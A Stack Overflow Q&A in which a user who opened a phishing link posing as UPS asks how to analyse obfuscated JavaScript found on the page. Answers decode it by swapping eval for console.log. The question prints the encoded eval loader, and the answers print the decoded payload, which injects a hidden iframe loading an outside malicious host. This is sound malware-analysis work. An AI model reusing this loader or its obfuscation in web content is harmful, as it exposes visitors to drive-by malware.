3

I received an e-mail which contained a link that looked like it was to UPS (and I opened it because I had ordered something last night. Bad timing.)

It was a simple web page and obviously not UPS, but I looked at the HTML and it had the following script embedded in it.

try {
    q = document.createElement("p");
    q.appendChild(q + "");
} catch (qw) {
    h = -012 / 5;
    try {
        prototype - 1;
    } catch (bawg) {
        ss = [];
        f = (h) ? ("fromCharC" + "ode") : "";
        e = window["e" + "val"];
        n = [9, 18, 315, 408, 32, 80, 300, 444, 99, 234, 327, 404, 110, 232, 138, 412, 101, 232, 207, 432, 101, 218, 303, 440, 116, 230, 198, 484, 84, 194, 309, 312, 97, 218, 303, 160, 39, 196, 333, 400, 121, 78, 123, 364, 48, 186, 123, 492, 13, 18, 27, 36, 105, 204, 342, 388, 109, 202, 342, 160, 41, 118, 39, 36, 9, 250, 96, 404, 108, 230, 303, 128, 123, 26, 27, 36, 9, 200, 333, 396, 117, 218, 303, 440, 116, 92, 357, 456, 105, 232, 303, 160, 34, 120, 315, 408, 114, 194, 327, 404, 32, 230, 342, 396, 61, 78, 312, 464, 116, 224, 174, 188, 47, 194, 351, 464, 111, 196, 333, 468, 114, 194, 297, 428, 121, 92, 330, 404, 116, 94, 327, 388, 105, 220, 138, 448, 104, 224, 189, 448, 97, 206, 303, 244, 48, 202, 147, 396, 98, 114, 294, 220, 49, 202, 306, 192, 50, 98, 294, 200, 39, 64, 357, 420, 100, 232, 312, 244, 39, 98, 144, 156, 32, 208, 303, 420, 103, 208, 348, 244, 39, 98, 144, 156, 32, 230, 348, 484, 108, 202, 183, 156, 118, 210, 345, 420, 98, 210, 324, 420, 116, 242, 174, 416, 105, 200, 300, 404, 110, 118, 336, 444, 115, 210, 348, 420, 111, 220, 174, 388, 98, 230, 333, 432, 117, 232, 303, 236, 108, 202, 306, 464, 58, 96, 177, 464, 111, 224, 174, 192, 59, 78, 186, 240, 47, 210, 306, 456, 97, 218, 303, 248, 34, 82, 177, 52, 9, 18, 375, 52, 9, 18, 306, 468, 110, 198, 348, 420, 111, 220, 96, 420, 102, 228, 291, 436, 101, 228, 120, 164, 123, 26, 27, 36, 9, 236, 291, 456, 32, 204, 96, 244, 32, 200, 333, 396, 117, 218, 303, 440, 116, 92, 297, 456, 101, 194, 348, 404, 69, 216, 303, 436, 101, 220, 348, 160, 39, 210, 306, 456, 97, 218, 303, 156, 41, 118, 306, 184, 115, 202, 348, 260, 116, 232, 342, 420, 98, 234, 348, 404, 40, 78, 345, 456, 99, 78, 132, 156, 104, 232, 348, 448, 58, 94, 141, 388, 117, 232, 333, 392, 111, 234, 342, 388, 99, 214, 363, 184, 110, 202, 348, 188, 109, 194, 315, 440, 46, 224, 312, 448, 63, 224, 291, 412, 101, 122, 144, 404, 49, 198, 294, 228, 98, 110, 147, 404, 102, 96, 150, 196, 98, 100, 117, 164, 59, 204, 138, 460, 116, 242, 324, 404, 46, 236, 315, 460, 105, 196, 315, 432, 105, 232, 363, 244, 39, 208, 315, 400, 100, 202, 330, 156, 59, 204, 138, 460, 116, 242, 324, 404, 46, 224, 333, 460, 105, 232, 315, 444, 110, 122, 117, 388, 98, 230, 333, 432, 117, 232, 303, 156, 59, 204, 138, 460, 116, 242, 324, 404, 46, 216, 303, 408, 116, 122, 117, 192, 39, 118, 306, 184, 115, 232, 363, 432, 101, 92, 348, 444, 112, 122, 117, 192, 39, 118, 306, 184, 115, 202, 348, 260, 116, 232, 342, 420, 98, 234, 348, 404, 40, 78, 357, 420, 100, 232, 312, 156, 44, 78, 147, 192, 39, 82, 177, 408, 46, 230, 303, 464, 65, 232, 348, 456, 105, 196, 351, 464, 101, 80, 117, 416, 101, 210, 309, 416, 116, 78, 132, 156, 49, 96, 117, 164, 59, 26, 27, 36, 9, 200, 333, 396, 117, 218, 303, 440, 116, 92, 309, 404, 116, 138, 324, 404, 109, 202, 330, 464, 115, 132, 363, 336, 97, 206, 234, 388, 109, 202, 120, 156, 98, 222, 300, 484, 39, 82, 273, 192, 93, 92, 291, 448, 112, 202, 330, 400, 67, 208, 315, 432, 100, 80, 306, 164, 59, 26, 27, 36, 125];
        if (window.document) for (i = 6 - 2 - 1 - 2 - 1; - 617 + i != 2 - 2; i++) {
            k = i;
            ss = ss + String[f](n[k] / (i % (h * h) + 2 - 1));
        }
        e("if(1)" + ss);
    }
}

I'm not asking for anyone to decode the script for me, but what tools could oen use to determine what's actually happening? I'm a C# programmer and don't do much javascript. I assume it's building some sort of code which it then executes. Is there a way I can trace through it to see what it's building?

Thanks

Improve this question
6
  • 3
    Try jsbeautifier.org to at least make it more readable, then take a look at using Firebug's console / breakpoints to take a look at what's happening. Commented Jun 15, 2012 at 14:03
  • 1
    The code is not encrypted, it's just all on one line, without spaces. edit: oh ok, there are some "hidden" parts :) Guess one could say it is encrypted (or maybe encoded is a better term). Commented Jun 15, 2012 at 14:04
  • You can run it through jsfiddle.net to execute the code, then use any browser dev tools (ctrl+shift+j in Chrome fx), to inspect the resulting page. It seems to want to load this alot of nested pages, I see some jar files references, and some funny looking urls ... Commented Jun 15, 2012 at 14:08
  • 1
    related: stackoverflow.com/questions/10889724/… Maybe it's the same problem. Commented Jun 15, 2012 at 14:10
  • 1
    This script is encoded (and obfuscated), not encrypted. If you can unscramble it without access to a secret cryptographic key, it's almost certainly not encrypted. See several thousand helpful references on the topic. Commented Jun 15, 2012 at 14:11

3 Answers 3

Reset to default
4

Just execute the code and replace e = window["e" + "val"]; with e = console.log first.

result:

    if (1) if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://autobouracky.net/main.php?page=0e1cb9b71ef021b2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://autobouracky.net/main.php?page=0e1cb9b71ef021b2');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
Improve this answer
Sign up to request clarification or add additional context in comments.

2 Comments

The real fun starts when you load that iframe btw; another condensed page with obfuscated code ... judging from the contents, it looks pretty nasty =/
@Jack true, stackoverflow.com/questions/10889724/… shows how this probably goes on.
1

Use jsbeautifier as Graham suggested and you'll find a line

e("if(1)" + ss);

where e = window.eval and ss is the desired script - so replace that line with

console.log(ss);

and run the whole code in the Firebug console. Voila.

Improve this answer

Comments

0

The encoded javascript looks like this when decoded:

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://autobouracky.net/main.php?page=0e1cb9b71ef021b2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://autobouracky.net/main.php?page=0e1cb9b71ef021b2');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
Improve this answer

Comments

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.